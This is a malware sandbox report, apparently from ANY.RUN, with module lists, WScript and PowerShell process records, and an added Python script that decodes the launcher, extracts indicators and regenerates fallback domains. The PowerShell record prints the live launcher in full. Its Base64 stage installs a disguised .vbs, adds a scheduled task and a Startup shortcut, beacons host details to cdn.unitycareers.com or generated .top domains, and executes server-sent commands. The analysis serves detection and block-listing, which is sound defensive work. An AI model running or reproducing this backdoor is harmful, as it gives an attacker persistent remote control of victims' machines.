c:\windows\system32\usp10.dll
c:\windows\system32\mfc42u.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\odbc32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\mmcbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\duser.dll
c:\windows\system32\imm32.dll
c:\windows\system32\odbcint.dll
c:\windows\system32\dui70.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmcndmgr.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\miguiresource.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\mlang.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\system32\sxs.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mmcex\43e41e76df61e51ec5697bffd6305357\mmcex.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mmcfxcommon\a69fdb8d83766e888a267e918f352abd\mmcfxcommon.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.drawing\1deaddfc41ab5efdec9a9b9faa759ada\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.windows.forms\e339f1036b8eb2c6be74704608908927\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\microsoft.net\framework64\v2.0.50727\diasymreader.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.managemen#\2d61188e8d276b33baa851e130a85120\microsoft.managementconsole.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\taskscheduler\8e5b3871639503250afc8dc86c878be7\taskscheduler.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\miguicontrols\3f5dd9d8b94bf201dd20485165cafc9a\miguicontrols.ni.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\comdlg32.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\custommarshalers\b78c08ac57ef3ed0fa122669719a89db\custommarshalers.ni.dll
c:\windows\assembly\gac_64\custommarshalers\2.0.0.0__b03f5f7f11d50a3a\custommarshalers.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\riched20.dll

PID
2676
CMD
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\WindowsIndexingService.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

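The WScript record above (PID 2676) shows the persistence artifact, C:\Users\Public\Libraries\WindowsIndexingService.vbs, started with no recorded parent, which is what a scheduled-task launch looks like in this listing. The PowerShell record that follows (PID 2744) carries the stage that installs it as a Base64 argument to FromBase64String, decoded as ASCII and handed to iex. Decoding that argument gives a script that writes the .vbs under %PUBLIC%\Libraries, keeps a lock file %TEMP%\AFX50058.tmp and a GUID file thumbcache_64.db beside the .vbs, creates a daily task named WindowsApplicationService with /RI 13 (every 13 minutes) and a Startup-folder WindowsApplicationService.lnk pointing at the .vbs, removes an older variant's WindowsIndexingService.js, thumbcache_33.db and WindowsIndexingService task, registers with http://cdn.unitycareers.com/ or with one of five fallback .top domains built as lower(base64(seed + yymmWW)) from the seeds hee, xu1, hs0, jd5 and mqf, checks that each reply starts with the 16-character key generated at registration, and then loops every 280 seconds running whatever the server returns through iex. The script below is an added example, not ANY.RUN's code and not the sample's: it decodes a launcher of that form, pulls the indicators out of the stage and reproduces the fallback-domain scheme for a given date. Its launcher and payload are constructed to mirror that record, with the C2 host replaced by the placeholder cdn.example.invalid, and the date handling assumes that Get-Date -UFormat %V gives the ISO week number.

```python
"""Decode the inline Base64 stage a PowerShell launcher carries, pull IOCs out of it,
and reproduce its fallback-domain scheme for a given date.

Added example for this report, not ANY.RUN's code and not the sample's own code.
CONSTRUCTED_CMDLINE has the shape of the PID 2744 command line (FromBase64String of an
ASCII script, then iex); CONSTRUCTED_STAGE is a cut-down re-creation of what that
argument decodes to, with the real C2 host replaced by cdn.example.invalid.
"""
import base64
import datetime
import re

# Two ways PowerShell launchers carry an encoded stage.
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
ENC_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_stage(cmdline: str) -> str:
    """Return the decoded script from a launcher command line."""
    m = B64_ARG.search(cmdline)
    if m:   # sample style: ASCII bytes, decoded with Encoding::ASCII, then iex
        return base64.b64decode(re.sub(r"\s+", "", m.group(1))).decode("ascii", "replace")
    m = ENC_CMD.search(cmdline)
    if m:   # -EncodedCommand style: UTF-16LE
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    raise ValueError("no encoded stage found in command line")


IOC_PATTERNS = {
    "urls": re.compile(r"https?://[^\s'\"`;)]+"),
    "dropped_files": re.compile(r"\\[\w.-]+\.(?:vbs|js|lnk|db|tmp|exe|dll)\b", re.I),
    "scheduled_tasks": re.compile(r"schtasks(?:\.exe)?\s+/create\b.*?/TN\s+\"([^\"]+)\"", re.I),
}


def extract_iocs(script: str) -> dict:
    """Static IOCs plus two behavioural markers: iex of fetched text and the beacon interval."""
    iocs = {name: sorted(set(rx.findall(script))) for name, rx in IOC_PATTERNS.items()}
    iocs["uses_iex"] = re.search(r"\b(?:iex|Invoke-Expression)\b", script, re.I) is not None
    iocs["sleep_seconds"] = [int(s) for s in re.findall(r"Start-Sleep\s+-s\s+(\d+)", script)]
    return iocs


def fallback_domains(day, seeds=("hee", "xu1", "hs0", "jd5", "mqf")) -> list:
    """Re-implement the stage's scheme: "http://" + lower(base64(seed + yymmWW)) + ".top/".

    The five default seeds are the literals in the decoded stage. WW follows
    Get-Date -UFormat "%y%m%V"; the ISO week is used here on the assumption that it
    matches PowerShell's %V for the date in question.
    """
    if isinstance(day, str):
        day = datetime.date.fromisoformat(day)
    stamp = f"{day:%y%m}{day.isocalendar()[1]:02d}"
    return ["http://" + base64.b64encode((s + stamp).encode()).decode().lower() + ".top/"
            for s in seeds]


# Constructed payload mirroring the structure of the decoded stage (not the full script).
CONSTRUCTED_STAGE = r'''$dir = $env:PUBLIC + "\Libraries";
$vbs = $dir + "\WindowsIndexingService.vbs";
$lock = $env:temp + "\AFX50058.tmp";
$guidfile = $dir + "\thumbcache_64.db";
$c2 = "http://cdn.example.invalid/";
"hee","xu1","hs0","jd5","mqf" | %{ $c2 += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
$lnk = [Environment]::GetFolderPath('Startup') + '\WindowsApplicationService.lnk';
schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 13 /du 23:59 /TR $vbs;
while ($true) { if ($r.length -gt 30) { iex $r }; Start-Sleep -s 280; $r = sendpost2; };
'''

# Constructed launcher in the exact form of the report's PID 2744 command line.
CONSTRUCTED_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -WindowStyle Hidden -c '
    "$a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( '"
    + base64.b64encode(CONSTRUCTED_STAGE.encode("ascii")).decode()
    + "' ) );iex $a;"
)

if __name__ == "__main__":
    stage = decode_stage(CONSTRUCTED_CMDLINE)
    for key, value in extract_iocs(stage).items():
        print(f"{key:16} {value}")
    print("fallback domains for 2019-10-09:", fallback_domains("2019-10-09"))
```

Pasting the real CMD field of PID 2744 into decode_stage() returns the full stage; fallback_domains() for the analysis week gives the five .top names worth adding to a block list alongside cdn.unitycareers.com, and it must be re-run each ISO week because the stamp changes.
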
PID
2744
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHRqZmdkYnlpID0gJGVudjpQVUJMSUMgKyAiXExpYnJhcmllcyIKaWYgKC1ub3QgKFRlc3QtUGF0aCAkdGpmZ2RieWkpKSB7IG1kICR0amZnZGJ5aTsgfQokdmZhZXZodXl2ID0gJHRqZmdkYnlpICsgIlxXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLnZicyI7CiRhdnV4emh6ICA9ICIxMDA2LjEiOwokZmJ2eWdianQgPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiR0dmNoeXhqamlhICA9ICR0amZnZGJ5aSArICJcdGh1bWJjYWNoZV82NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiR2Y2VidnViemR4ID0gInciOwoKZnVuY3Rpb24gaWFtd29yazJ7IHNjIC1QYXRoICRmYnZ5Z2JqdCAtVmFsdWUgJChHZXQtRGF0ZSk7IH07CmZ1bmN0aW9uIGd5aXV4emdkYncoICR3Z2RpaGNkZWYgKXsKICBpZiggJHdnZGloY2RlZiAtbWF0Y2ggJ091dE9mTWVtb3J5RXhjZXB0aW9uJyApewogICAgcmkgLVBhdGggJGZidnlnYmp0IC1Gb3JjZTsKICAgIGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzOwogICAgZXhpdDsKICB9Owp9CgpmdW5jdGlvbiBzZW5kcG9zdDIoICR3Z2RpaGNkZWYgKXsKICBpZiggISRteXVybHBvc3QgKXsgcmV0dXJuICRmYWxzZTsgfTsKICAkZmhpY2FnZyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7CiAgJGZoaWNhZ2cuQ3JlZGVudGlhbHMgPSBbU3lzdGVtLk5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7CiAgJGZoaWNhZ2cuSGVhZGVycy5BZGQoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsKICAkZmhpY2FnZy5FbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7CiAgdHJ5ewogICAgJGF5enZzY2JkID0gJGZoaWNhZ2cuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRhdnV4emh6Jmd1aWQ9JHd1d3p1eHYmIiArICR3Z2RpaGNkZWYgKSApICkgKTsKICAgICRheXp2c2NiZCA9IFtzdHJpbmddW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoICRheXp2c2NiZCApICk7CiAgICBpZiggISR2Y2VidnViemR4ICl7IHJldHVybiAkZmFsc2U7IH0KICAgIGlmKCAkdndkdmN0aWljIC1lcSAkYXl6dnNjYmQuU3Vic3RyaW5nKDAsMTYpICl7CiAgICAgIHJldHVybiAkYXl6dnNjYmQuU3Vic3RyaW5nKDE2LCRheXp2c2NiZC5sZW5ndGgtMTYpIDsKICAgIH1lbHNlewogICAgICAkdmNlYnZ1YnpkeCA9ICRmYWxzZTsKICAgICAgc2VuZHBvc3QyICgiZXJyb3I9IiArIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkYXl6dnNjYmQgKSApICk7CiAgICB9CiAgfWNhdGNoewogICAgZ3lpdXh6Z2RidyAkXy5FeGNlcHRpb24uTWVzc2FnZTsKICAgICR2Y2VidnViemR4ID0gJGZhbHNlOwogICAgJGZoaWNhZ2cuVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRhdnV4emh6Jmd1aWQ9JHd1d3p1eHYmZXJyb3I9c2VuZHBvc3QyOiIgKyAkbXl1cmxwb3N0KyI6IiskYXl6dnNjYmQgKyI6IisgJF8uRXhjZXB0aW9uLk1lc3NhZ2UgKSApICkgKTsKICB9OwogIHJldHVybiAkZmFsc2U7Cn07CgpmdW5jdGlvbiBoenlzYWhlc2IoICRhaml2Y3VkZ2ogKXsKICAkZ2ZjaGJ6dnQgPSAiaHR0cDovL2Nkbi51bml0eWNhcmVlcnMuY29tLyI7CiAgImhlZSIsInh1MSIsImhzMCIsImpkNSIsIm1xZiIgfCAleyAkZ2ZjaGJ6dnQgKz0gIiwiKyJodHRwOi8vIisgKCBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkXysgJChHZXQtRGF0ZSAtVUZvcm1hdCAiJXklbSVWIikgKSApLnRvTG93ZXIoKSApICsiLnRvcC8iOyB9OwogICRnZmNoYnp2dC5zcGxpdCgiLCIpIHwgJXsKICAgIGlmKCAhJG15dXJscG9zdCApewogICAgICAkbXl1cmxwb3N0ID0gJF87CiAgICAgIGlmKCAhKHNlbmRwb3N0MiAoJGFqaXZjdWRnaiArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIGlmKCAkYWppdmN1ZGdqIC1tYXRjaCAic3RhdHVzPXJlZ2lzdGVyIiApewogICAgcmV0dXJuICJvayI7CiAgfWVsc2V7CiAgICByZXR1cm4gJG15dXJscG9zdDsKICB9IAp9OwoKaWYgKCBUZXN0LVBhdGggJGZidnlnYmp0ICl7CiAgaWYgKCAoICggTkVXLVRJTUVTUEFOIC1TdGFydCAoKEdldC1DaGlsZEl0ZW0gJGZidnlnYmp0ICkuQ3JlYXRpb25UaW1lKSAtRW5kIChHZXQtRGF0ZSkpLk1pbnV0ZXMgKSAtZ3QgMTUgKXsKICAgIHJpIC1QYXRoICRmYnZ5Z2JqdCAtRm9yY2U7CiAgICB0cnl7IGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzIH1jYXRjaHt9OwogICAgZXhpdDsKICB9ZWxzZXsgZXhpdDsgfTsKfTsKCmZ1bmN0aW9uIHliaWV1dmYoICRhaXZ1YXVqYiApewogIGlmKCAkYWl2dWF1amIgKXsKICAgIHNjIC1QYXRoICR0dmNoeXhqamlhIC1WYWx1ZSAoIFtndWlkXTo6TmV3R3VpZCgpLCAoIFtndWlkXTo6TmV3R3VpZCgpIC1yZXBsYWNlICctJywnJyApLlN1YnN0cmluZygwLDE2KSAgLWpvaW4gJywnICkgLUZvcmNlOyAgCiAgICBnaSAkdHZjaHl4amppYSAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgICB0cnl7CiAgICAgICR3c2djaWh2ID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzQXBwbGljYXRpb25TZXJ2aWNlLmxuayc7CiAgICAgIGlmKCAtbm90ICggVGVzdC1QYXRoICR3c2djaWh2ICkgKXsKICAgICAgICAkd3hnYmd5Y3ogPSBOZXctT2JqZWN0IC1Db21PYmplY3QgKCdXU2NyaXB0LlNoZWxsJyk7CiAgICAgICAgJGpjandmYnhpID0gJHd4Z2JneWN6LkNyZWF0ZVNob3J0Y3V0KCAkd3NnY2lodiAgKTsKICAgICAgICAkamNqd2ZieGkuVGFyZ2V0UGF0aCA9ICR2ZmFldmh1eXY7CiAgICAgICAgJGpjandmYnhpLldvcmtpbmdEaXJlY3RvcnkgPSAkdGpmZ2RieWk7CiAgICAgICAgJGpjandmYnhpLldpbmRvd1N0eWxlID0gMTsKICAgICAgICAkamNqd2ZieGkuRGVzY3JpcHRpb24gPSAnV2luZG93cyBBcHBsaWNhdGlvbiBTZXJ2aWNlJzsKICAgICAgICAkamNqd2ZieGkuU2F2ZSgpOwogICAgICB9CiAgICB9Y2F0Y2h7fTsKICAgICR3dXd6dXh2LCAkdndkdmN0aWljID0gKGdldC1jb250ZW50ICR0dmNoeXhqamlhKS5zcGxpdCgnLCcpOwogICAgJGZjZGd1ZXYgPSAic3RhdHVzPXJlZ2lzdGVyJnNzaWQ9JHZ3ZHZjdGlpYyZvcz0iKyhbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24pKyImcHN2ZXI9IisoICggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3IgKSsgIiZjb21wX25hbWU9IiArICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE5hbWUpLk5hbWUudHJpbSgpICk7CiAgICBpZiggVGVzdC1QYXRoICggJHRqZmdkYnlpICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApICl7CiAgICAgIHJpIC1QYXRoICggJHRqZmdkYnlpICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApLCAoICR0amZnZGJ5aSArICJcV2luZG93c0luZGV4aW5nU2VydmljZS5qcyIgKSAtRm9yY2U7CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICBpZiggVGVzdC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAgKXsKICAgICAgICByaSAtUGF0aCAoIFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0luZGV4aW5nU2VydmljZS5sbmsnICkgLUZvcmNlOwogICAgICB9CiAgICB9CiAgICAkendkZ2V6eGIgPSBoenlzYWhlc2IgJGZjZGd1ZXY7CiAgICBpZiggJHp3ZGdlenhiIC1uZSAib2siKXsKICAgICAgcmkgLVBhdGggJHR2Y2h5eGpqaWEgLUZvcmNlOwogICAgICBleGl0OwogICAgfQogIH0KICByZXR1cm4gKGdldC1jb250ZW50ICR0dmNoeXhqamlhKS5zcGxpdCgnLCcpOwp9CiR2dXh0eGplZCA9IChzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NBcHBsaWNhdGlvblNlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDEzIC9kdSAyMzo1OSAvVFIgJHZmYWV2aHV5dik7IAppZiAoIFRlc3QtUGF0aCAkdHZjaHl4amppYSApewogICR3dXd6dXh2LCAkdndkdmN0aWljID0gIHliaWV1dmYgJGZhbHNlOwogIGlmKCAkdndkdmN0aWljLmxlbmd0aCAtbmUgMTYgICl7ICR3dXd6dXh2LCAkdndkdmN0aWljID0gIHliaWV1dmYgJHRydWU7IH0KfWVsc2V7CiAgJHd1d3p1eHYsICR2d2R2Y3RpaWMgPSAgeWJpZXV2ZiAkdHJ1ZTsKfQokbXl1cmxwb3N0ID0gaHp5c2FoZXNiOwp3aGlsZSggJHZjZWJ2dWJ6ZHggKXsKICBpYW13b3JrMjsKICB0cnl7CiAgICBpZiggJHZjZWJ2dWJ6ZHggLWFuZCAoJHZjZWJ2dWJ6ZHgubGVuZ3RoIC1ndCAzMCkgICl7CiAgICAgIGlleCAkdmNlYnZ1YnpkeDsKICAgIH07CiAgfWNhdGNoeyBneWl1eHpnZGJ3ICRfLkV4Y2VwdGlvbi5NZXNzYWdlOyB9OwogIFN0YXJ0LVNsZWVwIC1zIDI4MDsKICAkdmNlYnZ1YnpkeCA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGZidnlnYmp0IC1Gb3JjZTsK' ) );iex $a;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
